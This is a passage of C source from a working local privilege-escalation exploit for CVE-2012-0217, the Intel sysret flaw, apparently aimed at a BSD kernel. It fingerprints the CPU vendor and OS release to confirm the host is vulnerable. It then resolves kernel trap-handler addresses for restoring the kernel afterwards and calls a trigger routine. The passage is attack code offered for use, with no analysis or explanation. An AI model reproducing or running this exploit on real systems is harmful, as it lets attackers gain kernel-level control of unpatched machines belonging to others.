&& !strcmp(targets[i].machine, machine);
++i;
}
return found;
}
void get_cpu_vendor(char * cpu_vendor)
{
u_int regs[4];
do_cpuid(0, regs);
((u_int *)cpu_vendor)[0] = regs[1];
((u_int *)cpu_vendor)[1] = regs[3];
((u_int *)cpu_vendor)[2] = regs[2];
cpu_vendor[12] = '\0';
}
int is_intel()
{
char cpu_vendor[13];
get_cpu_vendor(cpu_vendor);
return !strcmp(cpu_vendor, "GenuineIntel");
}
int main(int argc, char *argv[])
{
printf("CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)\n\n");
printf("[*] Retrieving host information...\n");
char cpu_vendor[13];
get_cpu_vendor(cpu_vendor);
struct utsname ver;
uname(&ver);
printf(" [+] CPU: %s\n", cpu_vendor);
printf(" [+] sysname: %s\n", ver.sysname);
printf(" [+] release: %s\n", ver.release);
printf(" [+] version: %s\n", ver.version);
printf(" [+] machine: %s\n", ver.machine);
printf("[*] Validating target OS and version...\n");
if (!is_intel() || !validate_target(ver.sysname, ver.release, ver.machine)) {
printf(" [+] NOT Vulnerable :-(\n");
exit(1);
} else
printf(" [+] Vulnerable :-)\n");
// Prepare the values we'll need to restore the kernel to a stable state
printf("[*] Resolving kernel addresses...\n");
Xofl_ptr = (uintptr_t)get_symaddr("Xofl");
Xbnd_ptr = (uintptr_t)get_symaddr("Xbnd");
Xill_ptr = (uintptr_t)get_symaddr("Xill");
Xdna_ptr = (uintptr_t)get_symaddr("Xdna");
Xpage_ptr = (uintptr_t)get_symaddr("Xpage");
Xfpu_ptr = (uintptr_t)get_symaddr("Xfpu");
Xalign_ptr = (uintptr_t)get_symaddr("Xalign");
Xmchk_ptr = (uintptr_t)get_symaddr("Xmchk");
Xxmm_ptr = (uintptr_t)get_symaddr("Xxmm");
// doeet!
trigger();
return 0;
}